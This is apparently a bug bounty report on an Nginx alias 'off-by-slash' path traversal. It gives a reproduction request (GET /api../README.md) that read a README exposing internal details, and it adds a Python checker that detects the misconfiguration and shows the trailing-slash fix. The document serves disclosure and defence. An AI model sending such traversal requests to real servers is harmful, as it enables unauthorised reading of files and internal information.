
João Victor

Nginx Alias Path Traversal

Path Traversal
Overview of the Vulnerability
Path traversal abuses a server misconfiguration to read files and directories that the web application was never meant to serve. These can include operating-system files, the code and data that run the application, or in some cases user credentials.

An attacker can leverage the path traversal vulnerability in this application to read files from a directory that is not intended for public access.

Business Impact
Path traversal can lead to reputational damage for the business through a loss of user confidence and trust. It can also result in data theft and indirect financial losses through the costs of notification and remediation of breached PII if an attacker successfully exfiltrates user data.

Steps to Reproduce
Use Burp Suite to replicate this request:

```http
GET /api../README.md HTTP/2
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Connection: Keep-alive
```

Note that it was possible to read the contents of the file.

I performed other checks, but I was unable to read other commonly identified files; you can validate better by checking the names of other files that actually exist on the server and properly confirm the vulnerability.
Also note that the information contained in the README file is partly from the external environment: it mentions internal files, shows the execution of a cron job, displays the name of the internal server, among other information.
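The mechanism behind the title is the Nginx "off-by-slash" alias pattern: a `location` prefix written without a trailing slash, combined with `alias`, lets a URI such as `/api../README.md` match the prefix and be rewritten to `<alias>/../README.md`. The following is an added example, not code from the post or from the target; it is a small Python check that flags that pattern in an Nginx configuration and mimics the substitution Nginx performs, so the resulting filesystem path can be compared against the aliased directory. The configuration fragments, the `/api` prefix and the `/var/www/app/api/` path are constructed assumptions; the post does not show the site's real configuration.

```python
import posixpath
import re

# Constructed sample configurations (assumed for illustration, not from the post).
# The first is the vulnerable shape: prefix "/api" has no trailing slash.
VULNERABLE_CONF = """
location /api {
    alias /var/www/app/api/;
}
"""

# The usual fix: give the prefix a trailing slash so "/api../" no longer matches.
FIXED_CONF = """
location /api/ {
    alias /var/www/app/api/;
}
"""

# Very small matcher for "location [modifier] <prefix> { ... }" blocks.
LOCATION_RE = re.compile(r'location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{([^}]*)\}', re.S)
ALIAS_RE = re.compile(r'\balias\s+(\S+?);')


def find_alias_traversal(conf):
    """Return (prefix, alias) pairs where a prefix location without a trailing
    slash is combined with alias, i.e. the off-by-slash misconfiguration."""
    findings = []
    for match in LOCATION_RE.finditer(conf):
        modifier, prefix, body = match.groups()
        if modifier in ('=', '~', '~*'):
            # Exact and regex locations are matched differently; not covered here.
            continue
        alias = ALIAS_RE.search(body)
        if alias and not prefix.endswith('/'):
            findings.append((prefix, alias.group(1)))
    return findings


def nginx_alias_map(prefix, alias, uri):
    """Mimic alias substitution: the part of the URI matched by the location
    prefix is replaced by the alias path, with no normalisation of the result.
    Returns None when the URI does not match the prefix at all."""
    if not uri.startswith(prefix):
        return None
    return alias + uri[len(prefix):]


def escapes_root(prefix, alias, uri):
    """True when the mapped filesystem path resolves outside the alias directory."""
    mapped = nginx_alias_map(prefix, alias, uri)
    if mapped is None:
        return False
    root = posixpath.normpath(alias)
    target = posixpath.normpath(mapped)
    return target != root and not target.startswith(root + '/')


if __name__ == "__main__":
    for prefix, alias in find_alias_traversal(VULNERABLE_CONF):
        uri = prefix + "../README.md"
        print(f"{prefix} + alias {alias}: {uri} -> {nginx_alias_map(prefix, alias, uri)} "
              f"(escapes root: {escapes_root(prefix, alias, uri)})")
    print("fixed config findings:", find_alias_traversal(FIXED_CONF))
```

Nginx normalises `/../` segments in the request URI, but `/api../` contains no such segment, so the URI survives intact; the `..` only becomes a parent-directory reference after the prefix has been swapped for the alias path. With the trailing slash in place, `/api../README.md` simply does not match the location, which is why the check reports nothing for the fixed configuration.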

PoC:

[screenshot of the response showing the README contents]

Reward/Status:

[screenshot of the report status]
